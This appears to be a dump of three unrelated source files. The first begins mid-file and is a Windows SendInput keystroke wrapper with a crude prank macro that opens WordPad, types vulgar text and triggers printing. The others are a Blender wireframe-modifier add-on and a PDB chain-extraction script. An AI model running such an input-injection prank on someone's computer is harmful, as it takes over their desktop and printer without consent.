        # isn't set in dwFlags, so attempt to map the correct code.
        if not self.dwFlags & KEYEVENTF_UNICODE:
            self.wScan = user32.MapVirtualKeyExW(self.wVk,
                                                 MAPVK_VK_TO_VSC, 0)
class HARDWAREINPUT(ctypes.Structure):
    """ctypes mirror of the Win32 HARDWAREINPUT struct (winuser.h)."""
    _fields_ = (("uMsg", wintypes.DWORD),
                ("wParamL", wintypes.WORD),
                ("wParamH", wintypes.WORD))
class INPUT(ctypes.Structure):
    """ctypes mirror of the Win32 INPUT struct: a tagged union whose
    `type` field selects the keyboard, mouse or hardware member."""
    class _INPUT(ctypes.Union):
        _fields_ = (("ki", KEYBDINPUT),
                    ("mi", MOUSEINPUT),
                    ("hi", HARDWAREINPUT))
    # Anonymous union: ki/mi/hi are reachable directly on INPUT.
    _anonymous_ = ("_input",)
    _fields_ = (("type", wintypes.DWORD),
                ("_input", _INPUT))
# Pointer type for SendInput's pInputs parameter.
LPINPUT = ctypes.POINTER(INPUT)

def _check_count(result, func, args):
    """errcheck hook: SendInput returns the number of events injected;
    zero means failure, so surface the Windows error as an exception."""
    if result == 0:
        raise ctypes.WinError(ctypes.get_last_error())
    return args

user32.SendInput.errcheck = _check_count
user32.SendInput.argtypes = (wintypes.UINT, # nInputs
                             LPINPUT, # pInputs
                             ctypes.c_int) # cbSize
# Functions
def PressKey(hexKeyCode):
    """Synthesize a key-down event for the given virtual-key code."""
    event = INPUT(type=INPUT_KEYBOARD, ki=KEYBDINPUT(wVk=hexKeyCode))
    user32.SendInput(1, ctypes.byref(event), ctypes.sizeof(event))
def ReleaseKey(hexKeyCode):
    """Synthesize a key-up event for the given virtual-key code."""
    event = INPUT(type=INPUT_KEYBOARD,
                  ki=KEYBDINPUT(wVk=hexKeyCode, dwFlags=KEYEVENTF_KEYUP))
    user32.SendInput(1, ctypes.byref(event), ctypes.sizeof(event))
def AltTab():
    """Press Alt+Tab and hold Alt key for 2 seconds
    in order to see the overlay.
    """
    PressKey(VK_MENU)   # Alt down
    PressKey(VK_TAB)    # Tab down
    ReleaseKey(VK_TAB)  # Tab up
    time.sleep(2)       # keep the switcher overlay visible
    ReleaseKey(VK_MENU) # Alt up
def cum():
    """Prank macro: opens WordPad from the Start menu, types "cum sans",
    enlarges the text, opens the print dialog, then presses Alt+P.

    Purely side-effecting — synthesizes keyboard input via SendInput and
    requires an interactive Windows desktop with the Start menu focusable.
    """
    # Virtual-key codes (winuser.h).
    Spacebar = 0x20
    WKey = 0x57
    OKey = 0x4f
    RKey = 0x52
    DKey = 0x44
    PKey = 0x50
    AKey = 0x41
    Enter = 0x0D
    GreaterThan = 0xBE
    CKey = 0x43
    UKey = 0x55
    MKey = 0x4D
    SKey = 0x53
    NKey = 0x4E
    Control = 0x11
    Shift = 0x10

    def tap(*keys):
        """Press and release each key in turn."""
        for key in keys:
            PressKey(key)
            ReleaseKey(key)

    def chord(*keys):
        """Hold all keys down together, then release them (press order)."""
        for key in keys:
            PressKey(key)
        for key in keys:
            ReleaseKey(key)

    # Open the Start menu and type "wordpad".
    tap(windowskey)
    time.sleep(1)
    tap(WKey, OKey, RKey, DKey, PKey, AKey, DKey)
    time.sleep(1)
    tap(Enter)
    time.sleep(3)
    # Ctrl+Shift+> twelve times: grow the font.
    for _i in range(12):
        chord(Control, Shift, GreaterThan)
    # Type "cum sans".
    tap(CKey, UKey, MKey, Spacebar, SKey, AKey, NKey, SKey)
    time.sleep(2)
    # Ctrl+P: open the print dialog.
    chord(Control, PKey)
    time.sleep(1)
    # Alt+P.
    chord(VK_MENU, PKey)

if __name__ == "__main__":
    cum()
|
996,898 | 42c3c5b61ab1bdf9dfb0a2747ed3530b2ce49a66 | #
# Copyright (c) 2015 Conrad Dueck
#
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
# OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# made in response to --
# Andy Carney request for an easy toggle for all scene wireframe modifiers
#
# Add-on metadata consumed by Blender's add-on manager.
bl_info = {
    "name": "WireFrame Modifier Tool",
    "author": "conrad dueck",
    "version": (0,1,1),
    "blender": (2, 73, 0),  # minimum Blender version
    "location": "View3D > Tool Shelf > Addons",
    "description": "Turn OFF or ON all wireframe modifiers in the scene.",
    "warning": "",
    "wiki_url": "",
    "tracker_url": "",
    "category": "3D View"}
import bpy
#define button operators
class BUTTON_OT_wfmodon(bpy.types.Operator):
    '''Turn all scene wireframe modifiers ON.'''
    bl_idname = "wfmod.on"
    bl_label = "ON"
    bl_options = {'REGISTER', 'UNDO'}

    def execute(self, context):
        # Honour the "Only Selected" scene toggle.
        if bpy.context.scene.wfmodsel:
            targets = bpy.context.selected_objects
        else:
            targets = bpy.context.scene.objects
        # Enable every wireframe modifier for render and viewport.
        for obj in targets:
            for mod in obj.modifiers:
                if mod.type == 'WIREFRAME':
                    mod.show_render = 1
                    mod.show_viewport = 1
        return{'FINISHED'}
class BUTTON_OT_wfmodoff(bpy.types.Operator):
    '''Turn all scene wireframe modifiers OFF.'''
    bl_idname = "wfmod.off"
    bl_label = "OFF"
    bl_options = {'REGISTER', 'UNDO'}

    def execute(self, context):
        # Honour the "Only Selected" scene toggle.
        if bpy.context.scene.wfmodsel:
            targets = bpy.context.selected_objects
        else:
            targets = bpy.context.scene.objects
        # Disable every wireframe modifier for render and viewport.
        for obj in targets:
            for mod in obj.modifiers:
                if mod.type == 'WIREFRAME':
                    mod.show_render = 0
                    mod.show_viewport = 0
        return{'FINISHED'}
class BUTTON_OT_wfmodreplace(bpy.types.Operator):
    '''Toggle Replace Original checkbox.'''
    bl_idname = "wfmod.replace"
    bl_label = "Replace Toggle"
    bl_options = {'REGISTER', 'UNDO'}

    def execute(self, context):
        # Honour the "Only Selected" scene toggle.
        if bpy.context.scene.wfmodsel:
            targets = bpy.context.selected_objects
        else:
            targets = bpy.context.scene.objects
        for obj in targets:
            for mod in obj.modifiers:
                if mod.type == 'WIREFRAME':
                    # Flip the "Replace Original" flag.
                    mod.use_replace = not mod.use_replace
        return{'FINISHED'}
class BUTTON_OT_wfmoddelete(bpy.types.Operator):
    '''Delete wireframe modifiers'''
    bl_idname = "wfmod.delete"
    bl_label = "Delete"
    bl_options = {'REGISTER', 'UNDO'}

    def execute(self, context):
        """Remove every wireframe modifier from the targeted objects."""
        # Honour the "Only Selected" scene toggle.
        if bpy.context.scene.wfmodsel:
            theobjs = bpy.context.selected_objects
        else:
            theobjs = bpy.context.scene.objects
        for a in theobjs:
            # Snapshot the matches first: the original removed entries
            # while iterating a.modifiers directly, which skips elements
            # and could leave some wireframe modifiers undeleted.
            for c in [m for m in a.modifiers if m.type == 'WIREFRAME']:
                a.modifiers.remove(c)
        return{'FINISHED'}
#define panel
class VIEW3D_OT_wfmodtool(bpy.types.Panel):
    """Tool-shelf panel exposing the wireframe-modifier batch buttons."""
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'TOOLS'
    bl_label = "Wireframe Tool"
    bl_context = "objectmode"
    bl_category = 'Addons'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
        layout = self.layout
        layout.prop(context.scene, "wfmodsel")
        # One button per operator, labelled with the operator's bl_label.
        for idname, cls in (("wfmod.on", BUTTON_OT_wfmodon),
                            ("wfmod.off", BUTTON_OT_wfmodoff),
                            ("wfmod.replace", BUTTON_OT_wfmodreplace),
                            ("wfmod.delete", BUTTON_OT_wfmoddelete)):
            layout.operator(idname, text=cls.bl_label)
        layout.row()  # trailing spacer row (kept from the original)
#register
def register():
    """Register every class in this module and add the scene toggle."""
    bpy.utils.register_module(__name__)
    # Scene-level checkbox shown in the panel ("Only Selected").
    bpy.types.Scene.wfmodsel = bpy.props.BoolProperty \
        (
        name = "Only Selected",
        description = "Only act on selected objects",
        default = False
        )
def unregister():
    """Unregister the module's classes and remove the scene toggle."""
    bpy.utils.unregister_module(__name__)
    del bpy.types.Scene.wfmodsel
if __name__ == "__main__":
    register()
|
996,899 | a085bb994bc0eaafe69f307ce5a78d0cb2bd1bae | #!/usr/bin/env python
import sys
import string
#takes a list of pdbs with characters of the chains you want to keep
# example 1uad.pdb A,C
if __name__ == '__main__':
    # Input file lists one PDB plus the chains to keep per line,
    # e.g. "1uad.pdb A,C" (Python 2 script).
    pdbchainlist = open(sys.argv[1])
    for eachline in pdbchainlist:
        if len(eachline) < 2:
            print "Line is empty. Moving on..."
            continue
        splitline = eachline.split()
        # make the file name (strip ".pdb" and append the chain suffix)
        filename = splitline[0]
        output_filename= filename[:-4] + "_chain_"
        inputpdb = open( filename , "r" )
        pdb_str = inputpdb.read()
        commachains = splitline[1]
        eachchain=commachains.split(',')
        keptlines = []
        # iterate through the chains you want to keep
        for chain in eachchain:
            # scan every record of the PDB file
            for l in pdb_str.split("\n"):
                # column 22 (0-based slice 21:22) holds the chain ID
                if l[21:22] == chain:
                    # keep selenomethionine (MSE) HETATM records too
                    if l[:6] == "HETATM" and l[17:20] == "MSE":
                        # overwrite columns 57-60 with occupancy 1.00
                        # NOTE(review): assumes the record is >= 60 chars;
                        # shorter ATOM/TER lines would be corrupted by this
                        # splice -- confirm the inputs are full-width.
                        line = l[:56]+"1.00"+l[60:]
                        keptlines.append(line)
                    # ordinary residues and chain terminators
                    elif l[:4] == "ATOM" or l[:3] == "TER":
                        # fixes missing occupancy the same way
                        line = l[:56]+"1.00"+l[60:]
                        keptlines.append(line)
        # build the output name from every kept chain ID
        for substr in eachchain:
            output_filename = output_filename + substr
        output_filename = output_filename + ".pdb"
        print "Writing file: ",output_filename
        # now open and write to said file
        newpdb = open( output_filename , "w" )
        # write the kept records to the file
        for line in keptlines:
            newpdb.write(line + "\n")
        # close the file when done
        newpdb.close()
        # completed this input line
        continue
    print "Completed!"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.